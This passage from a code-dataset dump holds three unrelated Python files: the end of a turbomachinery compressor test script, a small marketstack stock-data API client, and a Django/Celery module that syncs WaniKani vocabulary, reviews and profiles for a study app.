#len(psiPerStg)\n \n # set ambient conditions and compressor operating parameters\n tamb = 15.0 + 273.15 # K\n pamb = 1.0034 # bar\n relHum = 60.0 # % humidity\n speed = 60.0 # hz\n \n alpR1In = 18.68 # deg\n \n # initialize the gas model\n gasMdl = SieRealGas(pamb, tamb, relHum)\n \n # set starting gas conditions from pamb and tamb\n rho, press, tCalc, hCalc, uCalc, sCalc, MWCalc, gamma, CpEq, CpFroz, Vsonic, Visc, PrEq, PrFroz, Keq, Kfroz = gasMdl.ceaTp(tamb, pamb)\n # print( rho, press, tCalc, hCalc, uCalc, sCalc, MWCalc, gamma, CpEq, CpFroz, Vsonic )\n\n pTotAmb = pamb\n tTotAmb = tCalc\n hTotAmb = hCalc\n sAmb = sCalc\n \n cbs = dict()\n cvs = dict()\n \n # print header for reporting station results\n CompressorStation.printStateHdr()\n \n # loop through each stage and run the calculations\n xTe_PrevRow = 0.0\n for iStg in range(numStgs):\n \n iBle = iStg * 4\n iBte = iBle + 1\n iVle = iBle + 2\n iVte = iBle + 3\n \n iB = iStg * 2\n iV = iB + 1\n \n cbNamePrev = 'cb{0:d}'.format(iStg)\n cvNamePrev = 'cv{0:d}'.format(iStg)\n \n cbName = 'cb{0:d}'.format(iStg+1)\n cvName = 'cv{0:d}'.format(iStg+1)\n \n \n # Initialize blade instance\n xLe_mm = xTe_PrevRow + axiGapPerRow[iB]\n afCnt = afCntPerRow[iB]\n tqc = tqcPerRow[iB]\n chord_mm = chordPerRow[iB]\n if (afTypePerRow[iB] == cbase.AirfoilType.HPA):\n newCb = CompressorBladeHpa(gasMdl, massflowPerStg[iStg], speed, xLe_mm\n , tqc, afCnt, chord_mm, False, False, 0.0, cbName)\n else:\n chrdAxi_mm = chrdAxiPerRow[iB]\n stgrAng = math.degrees( math.acos(chrdAxi_mm/chord_mm) )\n newCb = CompressorBlade(gasMdl, massflowPerStg[iStg], speed, xLe_mm\n , tqc, afCnt, chord_mm, stgrAng, cbName)\n \n # Get blade inlet conditions for this stage\n if (iStg == 0):\n # first stage use, ambient conditions (total pressure and temp) known and entrance alpha flow angle into the blade\n alpha_in = alpR1In\n hTot = hTotAmb\n s = sAmb\n else:\n # all other stages, use upstream stage vane exit values\n alpha_in = cvs[cvNamePrev].exit.getAlphaDeg()\n hTot = cvs[cvNamePrev].exit.hTotAbs()\n s = cvs[cvNamePrev].exit.s\n \n # calculate blade inlet station\n newCb.setInletFromPhi(phiPerStn[iBle], radRatioPerStn[iBle], alpha_in, hTot, s)\n newCb.inlet.printState()\n \n # calculate blade exit station\n if (afTypePerRow[iB] == cbase.AirfoilType.HPA):\n newCb.setExitFromPhiPsi(phiPerStn[iBte], radRatioPerStn[iBte], psiPerStg[iStg])\n else:\n newCb.setExitFromPhiPsiEta(phiPerStn[iBte], radRatioPerStn[iBte], psiPerStg[iStg], etaAdiabPerRow[iB])\n newCb.exit.printState()\n \n \n \n # Initialize vane instance\n xLe_mm = newCb.getXte()*1000.0 + axiGapPerRow[iV]\n afCnt = afCntPerRow[iV]\n tqc = tqcPerRow[iV]\n chord_mm = chordPerRow[iV]\n if (afTypePerRow[iV] == cbase.AirfoilType.HPA):\n newCv = CompressorVaneHpa(gasMdl, massflowPerStg[iStg], speed, xLe_mm\n , tqc, afCnt, chord_mm, False, False, 0.0, cvName)\n else:\n chrdAxi_mm = chrdAxiPerRow[iV]\n stgrAng = math.degrees( math.acos(chrdAxi_mm/chord_mm) )\n newCv = CompressorVane(gasMdl, massflowPerStg[iStg], speed, xLe_mm\n , tqc, afCnt, chord_mm, stgrAng, cvName)\n \n # Set parameters needed to calculate the vane inlet and exit conditions\n hStageIn = newCb.inlet.h\n delHblade = newCb.getDeltaH()\n lossCoeff = 0.00\n axiGapVane = axiGapPerRow[iV]\n react = reactPerStg[iStg]\n \n # calculate vane inlet station (set equal to blade exit station\n newCv.setInletFromUpstreamStation(axiGapVane, newCb.exit)\n newCv.inlet.printState()\n \n # calculate vane exit station\n if (afTypePerRow[iV] == cbase.AirfoilType.HPA):\n newCv.setExitFromPhiReact(phiPerStn[iVte], radRatioPerStn[iVte], react, hStageIn, delHblade)\n else:\n newCv.setExitFromPhiReactLossCoef(phiPerStn[iVte], radRatioPerStn[iVte], lossCoeff, react, hStageIn, delHblade)\n newCv.exit.printState()\n \n \n \n # store trailing edge x location of previous vane row\n xTe_PrevRow = newCv.getXte() * 1000.00\n \n cbs[cbName] = newCb\n cvs[cvName] = newCv\n \n #newCb.inlet.printState()\n #newCb2.inlet.printState()\n #newCb.exit.printState()\n #newCb2.exit.printState()\n \n #newCv.inlet.printState()\n #newCv.exit.printState()\n \n \n print(\"\\n\\n\")\n printStagePerfHdr()\n for iStg in range(numStgs):\n \n stgName = 'stg_{0:d}'.format(iStg+1)\n cbName = 'cb{0:d}'.format(iStg+1)\n cvName = 'cv{0:d}'.format(iStg+1)\n \n cb = cbs[cbName]\n cv = cvs[cvName]\n \n tplStg = (cb,cv)\n printStagePerf(stgName, tplStg)\n \n \n print(\"\\n\\n\")\n printStageGasAnglesHdr()\n for iStg in range(numStgs):\n \n stgName = 'stg_{0:d}'.format(iStg+1)\n cbName = 'cb{0:d}'.format(iStg+1)\n cvName = 'cv{0:d}'.format(iStg+1)\n \n cb = cbs[cbName]\n cv = cvs[cvName]\n \n tplStg = (cb,cv)\n printStageGasAngles(stgName, tplStg)\n \n ## DEBUG IMPLEMENTATIONS\n ## UNCOMMENT TO SEE TREND OF MASSFLOW VS RADIUS RELATIONSHIP\n #rads = list()\n #errs = list()\n #for i in range(1, 31):\n # rInnr = float(i/10.0)\n # args = (r1Inlet, phi, radRatio, math.radians(alpha_in))\n # err = CompressorStation.errMassFromPhiHtotPtot(rInnr, *args)\n \n #plt.plot(rads, errs, color = 'blue', linestyle = '--')\n #plt.show()\n\n\ndef testHpaModel():\n\n useBetaMidMdl = False\n \n useCaseyMod = False\n rzdCasey = 5.0\n \n # values taken from R05 50% span radial output of 68HK20_CFP01.inp\n betaIn = 52.47 # deg\n delBeta = 17.69 # deg\n machIn = 0.784\n avdr = 1.080\n tqc = 0.068\n cqs = 1.288\n chord = 0.13928 # m\n \n hpaMdl = HpaModel(useBetaMidMdl, useCaseyMod, rzdCasey)\n hpaMdl.setReferenceData(betaIn, delBeta, machIn, avdr, tqc, cqs, chord)\n \n vmo_vmi = 195.2/204.9\n reyIn = 0.5822e07\n\n hpaMdl.calcHpaState(betaIn, machIn, avdr, vmo_vmi, reyIn)\n\n\ndef fg5(cp1, cp2, rgas):\n # cp_avg / Rgas\n f = 1.0/rgas/2.0*(cp2+cp1)\n return f\n\ndef fg6a(fg5):\n # this is kappa(gamma)!!\n f = fg5/(fg5-1.0)\n return f\n\ndef fg1(fg6a):\n #FG1 = (FG6-1.0)/2.0\n # kappa - 1 / 2\n f = (fg6a-1.0)/2.0\n return f\n\ndef fg2(fg6a):\n #FG2 = (FG6+1.0)/2.0/(FG6-1.0)\n f = (fg6a+1.0)/2.0/(fg6a - 1.0)\n return f\n\ndef fg3(fg6a):\n # FG3 = 1.0/(FG6-1.0)\n f = 1.0/(fg6a-1.0)\n return f \n \ndef fg4(fg2):\n #FG4 = 0.5/FG2\n f = 0.5/fg2\n return f\n\ndef fg6b(fg6a):\n # this is kappa(gamma)!!\n f = 2.0/(fg6a+1.0)\n return f\n\n\ndef F2(A, cp1, cp2, rgas):\n # F2 - calculates the pressure coefficient from critical mach number\n # A : critical mach number\n _FG5 = fg5(cp1, cp2, rgas)\n _FG6a = fg6a(_FG5)\n _FG2 = fg2(_FG6a)\n _FG4 = fg4(_FG2)\n _FG6 = fg6b(_FG6a)\n _FG1 = fg1(_FG6a)\n \n ma2 = math.pow(A,2.0)\n # F2(A)=(1.0 - (FG6 + FG4 * A**2) **FG5 ) / ( 1.0+ FG1*A**2) **FG5 -1.0)\n f = (1.0 - math.pow( (_FG6 + _FG4 * ma2 ) , _FG5)) / (math.pow( (1.0+ _FG1*ma2 ) , _FG5) - 1.0)\n return f\n\n\ndef cpcrit(ma_inf, gamma):\n # pressure coefficient where the mach number somewhere along the airfoil is 1 as a function of the approach mach number\n gp1 = gamma + 1.0\n gm1ma2 = (gamma-1.0)*math.pow(ma_inf, 2.0)\n gqgm1 = gamma/(gamma-1.0)\n \n a = 2.0/(gamma*math.pow(ma_inf,2.0))\n b = (2.0 + gm1ma2)/(gp1)\n c = math.pow(b, gqgm1 )\n \n #f = 2.0/(gamma*math.pow(ma_crit,2.0)) * ( math.pow((2.0 + (gamma-1.0)*math.pow(ma_crit, 2.0)/(gamma+1.0)), (gamma/(gamma-1.0))) - 1.0 )\n f = a * ( c - 1.0 )\n return f\n\n\ndef testGasDynStuff():\n \n # set ambient conditions and compressor operating parameters\n tamb = 15.0 + 273.15 # K\n pamb = 1.0034 # bar\n relHum = 60.0 # % humidity\n \n # initialize the gas model\n gasMdl = SieRealGas(pamb, tamb, relHum)\n \n # set starting gas conditions from pamb and tamb\n rho, press, tCalc, hCalc, uCalc, sCalc, MWCalc, gamma, CpEq, CpFroz, Vsonic, Visc, PrEq, PrFroz, Keq, Kfroz = gasMdl.ceaTp(tamb, pamb)\n # print( rho, press, tCalc, hCalc, uCalc, sCalc, MWCalc, gamma, CpEq, CpFroz, Vsonic ) \n \n # examine the FG functions to understand the equations behind them\n _FG5 = fg5(CpEq, CpEq, gasMdl.Rgas)\n _FG5test = gamma/(gamma-1.0)\n \n _FG6a = fg6a(_FG5)\n _FG6atest = gamma\n \n _FG2 = fg2(_FG6a)\n _FG2test = (gamma+1.0)/(2*(gamma-1.0))\n \n _FG4 = fg4(_FG2)\n _FG4test = (gamma - 1.0)/(gamma + 1.0)\n \n _FG6b = fg6b(_FG6a)\n _FG6btest = 2.0 / (gamma + 1.0)\n \n _FG1 = fg1(_FG6a)\n _FG1test = (gamma - 1.0)/2.0\n \n# cp_cr1 = F2(0.8, gamma)\n# cp_cr2 = cpcrit(0.8, gamma)\n\n\n#--- MAIN ---\nif __name__ == '__main__':\n testMeanline()\n #testHpaModel()\n #testGasDynStuff()","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":26547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"627187685","text":"import configparser\nimport json\nimport requests\nimport datetime as d\n\n\ndef apicall(key: int, symbol: str, date_from: str, date_to: str, limit: int = 1) -> dict:\n \"\"\"\n\n\n :param key:\n :param symbol:\n :param date_from:\n :param date_to:\n :return json data:\n \"\"\"\n url = f'http://api.marketstack.com/v1/eod?access_key={key}&symbols={symbol}'\n\n params = {\n \"date_from\": date_from,\n \"date_to\": date_to,\n \"limit\": limit\n }\n\n res = requests.get(url, params=params)\n if res.status_code != 200:\n raise ConnectionRefusedError(\"Entered symbol or key is wrong\")\n else:\n pass\n\n data = json.loads(res.text)\n return data\n\n\n# UPDATE DATES TO GET NEW VALUES\n# CURRENT DATE -\ndate = d.datetime.now()\ndate = date.strftime(\"%Y-%m-%d\")\n# print(\"Today the date is:\", date)\n\n#Closing Date\n# today = d.date.today()\n# close_date = today - d.timedelta(days=1)\n# close_date = close_date.strftime(\"%Y-%m-%d\")\n# print(\"One day ago the date was CLOSE DATE:\", close_date)\n\n#Opening Date\n# open_date = today - d.timedelta(days=2)\n# open_date = open_date.strftime(\"%Y-%m-%d\")\n# print(\"Two days ago the date was OPEN DATE:\", open_date)\n\n#Safe Values\nopen_date = \"2021-05-01\"\nclose_date = \"2021-05-02\"\n# format - yyyy-mm-dd --- eg -> 2021-04-17\n\ndef getdata(symbol: str, date_from: str = open_date,\n date_to: str = close_date, **kwargs) -> list:\n \"\"\"\n\n :rtype: list\n :type date_to: object\n :param date_from: \n :param symbol:\n :param kwargs:\n :return list of values:\n \"\"\"\n values = []\n\n cfg: configparser.ConfigParser = configparser.ConfigParser()\n cfg.read('configuration.cfg')\n key = cfg.get(\"API KEY\", \"key\")\n\n data_list: list = apicall(key, symbol, date_from=date_from, date_to=date_to)[\"data\"]\n # print(data_list)\n if data_list:\n data_dict = data_list[0]\n\n else:\n raise ValueError(\"Entered dates are not correct\")\n\n for _, varg in kwargs.items():\n if varg in data_dict.keys():\n values.append(data_dict[varg])\n\n return values\n\n\nif __name__ == '__main__':\n symbol = \"GOOGL\"\n print(open_date, close_date)\n print(getdata(close='close', symbol=symbol,\n date_from=open_date, date_to=close_date))\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"281220720","text":"from __future__ import absolute_import\nimport logging\n\nfrom celery import shared_task\nfrom django.contrib.auth.models import User\nfrom django.db.models import F\nfrom django.db.models import Min\nfrom kw_webapp.wanikani import make_api_call\nfrom kw_webapp.wanikani import exceptions\nfrom kw_webapp import constants\nfrom kw_webapp.models import UserSpecific, Vocabulary, Profile, Level\nfrom datetime import timedelta, datetime\nfrom django.utils import timezone\nfrom async_messages import messages\n\nlogger = logging.getLogger('kw.tasks')\n\n\ndef past_time(hours_ago):\n \"\"\"\n Generates a datetime object X hours in the past.\n\n :param hours_ago: number of hours ago you'd like a datetime for\n :return: a datetime object indicting the time it was hours_ago hours ago.\n \"\"\"\n srs_level_hours = timedelta(hours=hours_ago)\n now = timezone.now()\n return now - srs_level_hours\n\n\n@shared_task\ndef all_srs(user=None):\n '''\n Task that performs an SRS update for users. Checks user current streak and last_reviewed_date in order to determine\n when the next review should be. If the time for the review is in the past, flag it for review for the user.\n\n :param user: Optional Param, the user to be updated. If left blank, will update all users.\n :return: None\n '''\n logger.info(\"Beginning SRS run for {}.\".format(user or \"all users\"))\n affected_count = 0\n for streak, srs_timing in constants.SRS_TIMES.items():\n study_threshold = past_time(srs_timing)\n if user and not user.profile.on_vacation:\n review_set = UserSpecific.objects.filter(user=user,\n last_studied__lte=study_threshold,\n streak=streak,\n needs_review=False)\n else:\n review_set = UserSpecific.objects.filter(user__profile__on_vacation=False,\n last_studied__lte=study_threshold,\n streak=streak,\n needs_review=False)\n if review_set.count() > 0:\n logger.info(\n \"{} has {} reviews for SRS level {}\".format((user or \"all users\"), review_set.count(), streak))\n affected_count += review_set.update(needs_review=True)\n else:\n logger.info(\"{} has no reviews for SRS level {}\".format((user or \"all users\"), streak))\n\n logger.info(\"Finished SRS run for {}.\".format(user or \"all users\"))\n return affected_count\n\n\ndef get_vocab_by_meaning(meaning):\n \"\"\"\n Searches for a vocabulary object based on its meaning.\n\n :param meaning: meaning to search for\n :return: the vocabulary object, or None\n \"\"\"\n try:\n v = Vocabulary.objects.get(meaning=meaning)\n except Vocabulary.DoesNotExist:\n logger.error(\"While attempting to get vocabulary {} we could not find it!\".format(meaning))\n raise Vocabulary.DoesNotExist(\"Couldn't find meaning: {}\".format(meaning))\n else:\n return v\n\n\ndef associate_vocab_to_user(vocab, user):\n '''\n takes a vocab, and creates a UserSpecific object for the user based on it. Returns the vocab object.\n :param vocab: the vocabulary object to associate to the user.\n :param user: The user.\n :return: the vocabulary object after association to the user\n '''\n try:\n review, created = UserSpecific.objects.get_or_create(vocabulary=vocab, user=user)\n if created:\n review.needs_review = True\n review.next_review_date = timezone.now()\n review.save()\n return review, created\n\n except UserSpecific.MultipleObjectsReturned:\n us = UserSpecific.objects.filter(vocabulary=vocab, user=user)\n for u in us:\n logger.error(\n \"during {}'s WK sync, we received multiple UserSpecific objects. Details: {}\".format(user.username,\n u))\n return None, None\n\n\ndef get_level_pages(levels):\n page_size = 5\n return [levels[i:i+page_size] for i in range(0, len(levels), page_size)]\n\n\ndef build_API_sync_string_for_user(user):\n '''\n Builds a vocabulary api string for the user which includes all relevant levels. Goes back 3 levels from current by default.\n\n :param user: The user to have their vocab updated\n :return: A fully formed and ready-to-request API string.\n '''\n api_call = \"https://www.wanikani.com/api/user/{}/vocabulary/\".format(user.profile.api_key)\n # if the user has unlocked recent levels, check for new vocab on them as well.\n levels = user.profile.unlocked_levels_list()\n level_string = \",\".join(str(level) for level in levels) if isinstance(levels, list) else levels\n api_call += level_string\n return api_call\n\n\ndef build_API_sync_string_for_user_for_levels(user, levels):\n '''\n Given a user, build a vocabulary request string based on their api key, for a particular level.\n :param user: The related user.\n :param level: The level of vocabulary we want to update.\n :return: The fully formatted API string that will provide.\n '''\n level_string = \",\".join(str(level) for level in levels) if isinstance(levels, list) else levels\n api_call = \"https://www.wanikani.com/api/user/{}/vocabulary/{}\".format(user.profile.api_key, level_string)\n api_call += ','\n return api_call\n\n\ndef lock_level_for_user(requested_level, user):\n reviews = UserSpecific.objects.filter(user=user, vocabulary__readings__level=requested_level).distinct()\n count = reviews.count()\n reviews.delete()\n level = Level.objects.get(profile=user.profile, level=requested_level)\n user.profile.unlocked_levels.remove(level)\n return count\n\n\ndef unlock_all_possible_levels_for_user(user):\n \"\"\"\n\n :param user: User to fully unlock.\n :return: The list of levels unlocked, how many vocab were unlocked, how many vocab remain locked (as they are locked in WK)\n \"\"\"\n level_list = [level for level in range(1, user.profile.level + 1)]\n unlocked, locked = unlock_eligible_vocab_from_levels(user, level_list)\n return level_list, unlocked, locked\n\n\n@shared_task\ndef unlock_eligible_vocab_from_levels(user, levels):\n \"\"\"\n I don't like duplicating code like this, but its for the purpose of reducing API call load on WaniKani. It's a hassle if the user caps out.\n :param user: user to add vocab to.\n :param levels: requested level unlock. This can also be a list.\n :return: unlocked count, locked count\n \"\"\"\n unlocked = locked = 0\n\n api_call_string = build_API_sync_string_for_user_for_levels(user, levels)\n\n try:\n response = make_api_call(api_call_string)\n unlocked, locked = process_vocabulary_response_for_unlock(user, response)\n except exceptions.InvalidWaniKaniKey:\n logger.error(\"Invalid key found for user {}\".format(user.username))\n user.profile.api_valid = False\n user.profile.save()\n except exceptions.WanikaniAPIException:\n logger.error(\"Non-invalid key error found during API call. \")\n return unlocked, locked\n\n\ndef get_wanikani_level_by_api_key(api_key):\n api_string = \"https://www.wanikani.com/api/user/{}/user-information\".format(api_key)\n response = make_api_call(api_string)\n user_info = response[\"user_information\"]\n level = user_info[\"level\"]\n return level\n\n\n@shared_task\ndef sync_user_profile_with_wk(user):\n '''\n Hits the WK api with user information in order to synchronize user metadata such as level and gravatar information.\n\n :param user: The user to sync their profile with WK.\n :return: boolean indicating the success of the API call.\n '''\n api_string = \"https://www.wanikani.com/api/user/{}/user-information\".format(user.profile.api_key)\n\n try:\n json_data = make_api_call(api_string)\n except exceptions.InvalidWaniKaniKey:\n user.profile.api_valid = False;\n user.profile.save()\n return False\n\n user_info = json_data[\"user_information\"]\n user.profile.title = user_info[\"title\"]\n user.profile.join_date = datetime.utcfromtimestamp(user_info[\"creation_date\"])\n user.profile.topics_count = user_info[\"topics_count\"]\n user.profile.posts_count = user_info[\"posts_count\"]\n user.profile.about = user_info[\"about\"]\n user.profile.set_website(user_info[\"website\"])\n user.profile.set_twitter_account(user_info[\"twitter\"])\n user.profile.gravatar = user_info[\"gravatar\"]\n user.profile.last_wanikani_sync_date = timezone.now()\n user.profile.api_valid = True\n if user.profile.follow_me:\n user.profile.unlocked_levels.get_or_create(level=user_info[\"level\"])\n user.profile.handle_wanikani_level_change(user_info[\"level\"])\n\n user.profile.save()\n\n logger.info(\"Synced {}'s Profile.\".format(user.username))\n return True\n\n\n@shared_task\ndef sync_with_wk(user_id, full_sync=False):\n '''\n Takes a user. Checks the vocab list from WK for all levels. If anything new has been unlocked on the WK side,\n it also unlocks it here on Kaniwani and creates a new review for the user.\n\n :param user_id: id of the user to sync\n :param full_sync:\n :return: None\n '''\n # We split this into two seperate API calls as we do not necessarily know the current level until\n # For the love of god don't delete this next line\n user = User.objects.get(pk=user_id)\n logger.info(\"About to begin sync for user {}.\".format(user.username))\n profile_sync_succeeded = sync_user_profile_with_wk(user)\n if user.profile.api_valid:\n if not full_sync:\n new_review_count, new_synonym_count = sync_recent_unlocked_vocab_with_wk(user)\n else:\n new_review_count, new_synonym_count = sync_unlocked_vocab_with_wk(user)\n\n # Async messaging system.\n if new_review_count or new_synonym_count:\n logger.info(\"Sending message to front-end for user {}\".format(user.username))\n messages.success(user,\n \"Your Wanikani Profile has been synced. You have {} new reviews, and {} new synonyms\".format(\n new_review_count, new_synonym_count))\n\n return profile_sync_succeeded, new_review_count, new_synonym_count\n else:\n logger.warn(\n \"Not attempting to sync, since API key is invalid, or user has indicated they do not want to be followed \")\n\n\ndef create_new_vocabulary(vocabulary_json):\n '''\n Creates a new vocabulary based on a json object provided by Wanikani and returns this vocabulary.\n :param vocabulary_json: A JSON object representing a single vocabulary, as provided by Wanikani.\n :return: The newly created Vocabulary object.\n '''\n kana_list = [reading.strip() for reading in\n vocabulary_json[\"kana\"].split(\",\")] # Splits out multiple readings for one vocab.\n meaning = vocabulary_json[\"meaning\"]\n vocab = Vocabulary.objects.create(meaning=meaning)\n vocab = associate_readings_to_vocab(vocab, vocabulary_json)\n logger.info(\"Created new vocabulary with meaning {} and legal readings {}\".format(meaning, kana_list))\n return vocab\n\n\ndef associate_readings_to_vocab(vocab, vocabulary_json):\n kana_list = [reading.strip() for reading in\n vocabulary_json[\"kana\"].split(\",\")] # Splits out multiple readings for one vocab.\n character = vocabulary_json[\"character\"]\n level = vocabulary_json[\"level\"]\n for reading in kana_list:\n new_reading, created = vocab.readings.get_or_create(kana=reading, character=character)\n new_reading.level = level\n new_reading.save()\n if created:\n logger.info(\"\"\"Created new reading: {}, level {}\n associated to vocab {}\"\"\".format(new_reading.kana, new_reading.level,\n new_reading.vocabulary.meaning))\n return vocab\n\n\ndef get_or_create_vocab_by_json(vocab_json):\n \"\"\"\n if lookup by meaning fails, create a new vocab object and return it. See JSON Example here https://www.wanikani.com/api\n :param: vocab_json: a dictionary holding the information needed to create new vocabulary.\n :return:\n \"\"\"\n try:\n vocab = get_vocab_by_meaning(vocab_json['meaning'])\n except Vocabulary.DoesNotExist as e:\n vocab = create_new_vocabulary(vocab_json)\n return vocab\n\n\ndef add_synonyms_from_api_call_to_review(review, user_specific_json):\n new_synonym_count = 0\n if user_specific_json[\"user_synonyms\"] is None:\n return review, new_synonym_count\n\n for synonym in user_specific_json[\"user_synonyms\"]:\n _, created = review.meaningsynonym_set.get_or_create(text=synonym)\n if created:\n new_synonym_count += 1\n return review, new_synonym_count\n\n\ndef associate_synonyms_to_vocab(user, vocab, user_specific):\n review = None\n new_synonym_count = 0\n\n try:\n review = UserSpecific.objects.get(user=user, vocabulary=vocab)\n _, new_synonym_count = add_synonyms_from_api_call_to_review(review, user_specific)\n except UserSpecific.DoesNotExist:\n pass\n\n return review, new_synonym_count\n\n\ndef get_users_reviews(user):\n if user.profile.only_review_burned:\n return UserSpecific.objects.filter(user=user, wanikani_burned=True, hidden=False)\n else:\n return UserSpecific.objects.filter(user=user, hidden=False)\n\n\ndef get_users_current_reviews(user):\n if user.profile.only_review_burned:\n return UserSpecific.objects.filter(user=user,\n needs_review=True,\n wanikani_burned=True,\n hidden=False,\n burned=False)\n else:\n return UserSpecific.objects.filter(user=user,\n needs_review=True,\n hidden=False,\n burned=False)\n\n\ndef get_users_future_reviews(user, time_limit=None):\n if user.profile.only_review_burned:\n queryset = UserSpecific.objects.filter(user=user,\n needs_review=False,\n wanikani_burned=True,\n hidden=False,\n burned=False).annotate(Min('next_review_date')).order_by(\n 'next_review_date')\n else:\n queryset = UserSpecific.objects.filter(user=user,\n needs_review=False,\n hidden=False,\n burned=False).annotate(Min('next_review_date')).order_by(\n 'next_review_date')\n\n if isinstance(time_limit, timedelta):\n queryset = queryset.filter(next_review_date__lte=timezone.now() + time_limit)\n\n return queryset\n\n\ndef process_vocabulary_response_for_unlock(user, json_data):\n \"\"\"\n Given a JSON Object from WK, iterate over the list of vocabulary, and synchronize the user.\n :param user:\n :param json_data:\n :return:\n \"\"\"\n vocab_list = json_data['requested_information']\n vocab_list = [vocab_json for vocab_json in vocab_list if\n vocab_json['user_specific'] is not None] # filters out locked items.\n unlocked = len(vocab_list)\n locked = len(json_data['requested_information']) - unlocked\n for vocabulary_json in vocab_list:\n user_specific = vocabulary_json['user_specific']\n vocab = get_or_create_vocab_by_json(vocabulary_json)\n vocab = associate_readings_to_vocab(vocab, vocabulary_json)\n new_review, created = associate_vocab_to_user(vocab, user)\n new_review, synonyms_added_count = add_synonyms_from_api_call_to_review(new_review, user_specific)\n new_review.wanikani_srs = user_specific[\"srs\"]\n new_review.wanikani_srs_numeric = user_specific[\"srs_numeric\"]\n new_review.wanikani_burned = user_specific[\"burned\"]\n new_review.save()\n logger.info(\"Unlocking level for {}\".format(user.username))\n return unlocked, locked\n\n\ndef process_vocabulary_response_for_user(user, json_data):\n \"\"\"\n Given a response object from Requests.get(), iterate over the list of vocabulary, and synchronize the user.\n :param json_data:\n :param user:\n :return:\n \"\"\"\n new_review_count = 0\n new_synonym_count = 0\n vocab_list = json_data['requested_information']\n vocab_list = [vocab_json for vocab_json in vocab_list if\n vocab_json['user_specific'] is not None] # filters out locked items.\n for vocabulary_json in vocab_list:\n user_specific = vocabulary_json['user_specific']\n vocab = get_or_create_vocab_by_json(vocabulary_json)\n vocab = associate_readings_to_vocab(vocab, vocabulary_json)\n if user.profile.follow_me:\n new_review, created = associate_vocab_to_user(vocab, user)\n if created:\n new_review_count += 1\n new_review, synonyms_added_count = add_synonyms_from_api_call_to_review(new_review, user_specific)\n new_synonym_count += synonyms_added_count\n else: # User does not want to be followed, so we prevent creation of new vocab, and sync only synonyms instead.\n new_review, synonyms_added_count = associate_synonyms_to_vocab(user, vocab, user_specific)\n new_synonym_count += synonyms_added_count\n if new_review:\n new_review.wanikani_srs = user_specific[\"srs\"]\n new_review.wanikani_srs_numeric = user_specific[\"srs_numeric\"]\n new_review.wanikani_burned = user_specific[\"burned\"]\n new_review.save()\n logger.info(\"Synced Vocabulary for {}\".format(user.username))\n return new_review_count, new_synonym_count\n\n\ndef sync_recent_unlocked_vocab_with_wk(user):\n if user.profile.unlocked_levels_list():\n levels = [level for level in range(user.profile.level - 2, user.profile.level + 1) if\n level in user.profile.unlocked_levels_list()]\n if levels:\n request_string = build_API_sync_string_for_user_for_levels(user, levels)\n json_data = make_api_call(request_string)\n new_review_count, new_synonym_count = process_vocabulary_response_for_user(user, json_data)\n return new_review_count, new_synonym_count\n return 0, 0\n\n\ndef sync_unlocked_vocab_with_wk(user):\n if user.profile.unlocked_levels_list():\n pages = get_level_pages(user.profile.unlocked_levels_list())\n new_review_count = new_synonym_count = 0\n for page in pages:\n request_string = build_API_sync_string_for_user_for_levels(user, page)\n logger.info(\"Creating sync string for user {}: {}\".format(user.username, user.profile.api_key))\n response = make_api_call(request_string)\n current_page_review_count, current_page_synonym_count = process_vocabulary_response_for_user(user, response)\n new_review_count += current_page_review_count\n new_synonym_count += current_page_synonym_count\n return new_review_count, new_synonym_count\n else:\n return 0, 0\n\n\n@shared_task\ndef sync_all_users_to_wk():\n '''\n calls sync_with_wk for all users, causing all users to have their newly unlocked vocabulary synchronized to KW.\n\n :return: the number of users successfully synced to WK.\n '''\n one_week_ago = past_time(24 * 7)\n logger.info(\"Beginning Bi-daily Sync for all user!\")\n users = User.objects.all().exclude(profile__isnull=True)\n logger.info(\"Original sync would have occurred for {} users.\".format(users.count()))\n users = User.objects.filter(profile__last_visit__gte=one_week_ago)\n logger.info(\"Sync will occur for {} users.\".format(users.count()))\n affected_count = 0\n for user in users:\n print(user.username + \" --- \" + str(user.profile.last_visit) + \" --- \" + str(one_week_ago))\n sync_with_wk.delay(user.id, full_sync=True)\n affected_count += 1\n return affected_count\n\n\n@shared_task\ndef repopulate():\n '''\n A task that uses my personal API key in order to re-sync the database. Koichi often decides to switch things around\n on a level-per-level basis, or add synonyms, or change which readings are allowed. This method attempts to synchronize\n our data sets.\n\n :return:\n '''\n url = \"https://www.wanikani.com/api/user/\" + constants.API_KEY + \"/vocabulary/{}\"\n logger.info(\"Staring DB Repopulation from WaniKani\")\n for level in range(constants.LEVEL_MIN, constants.LEVEL_MAX + 1):\n json_data = make_api_call(url.format(level))\n vocabulary_list = json_data['requested_information']\n for vocabulary in vocabulary_list:\n sync_single_vocabulary_item_by_json(vocabulary)\n\n\ndef sync_single_vocabulary_item_by_json(vocabulary_json):\n meaning = vocabulary_json[\"meaning\"]\n new_vocab, created = Vocabulary.objects.get_or_create(meaning=meaning)\n associate_readings_to_vocab(new_vocab, vocabulary_json)\n if created:\n logger.info(\"Found new Vocabulary item from WaniKani:{}\".format(new_vocab.meaning))\n\n\ndef pull_user_synonyms_by_level(user, level):\n '''\n Retrieves vocabulary list from the WK API, specifically searching to pull in synonyms.\n\n :param user: User to pull WK synonyms or\n :param level: The level for synonyms that should be pulled\n :return: None\n '''\n request_string = build_API_sync_string_for_user_for_levels(user, level)\n json_data = make_api_call(request_string)\n try:\n vocabulary_list = json_data['requested_information']\n for vocabulary in vocabulary_list:\n meaning = vocabulary[\"meaning\"]\n if vocabulary['user_specific'] and vocabulary['user_specific']['user_synonyms']:\n try:\n review = UserSpecific.objects.get(user=user, vocabulary__meaning=meaning)\n for synonym in vocabulary['user_specific']['user_synonyms']:\n review.meaningsynonym_set.get_or_create(text=synonym)\n review.save()\n except UserSpecific.DoesNotExist as e:\n logger.error(\"Couldn't pull review during a synonym sync: {}\".format(e))\n except KeyError as e:\n logger.error(\"No user_specific or synonyms?: {}\".format(json_data))\n except UserSpecific.MultipleObjectsReturned:\n reviews = UserSpecific.objects.filter(user=user, vocabulary__meaning=meaning)\n for review in reviews:\n logger.error(\n \"Found something janky! Multiple reviews under 1 vocab meaning?!?: {}\".format(\n review))\n except KeyError:\n logger.error(\"NO requested info?: {}\".format(json_data))\n\n\ndef pull_all_user_synonyms(user=None):\n '''\n Syncs up the user's synonyms for WK for all levels that they have currently unlocked.\n\n 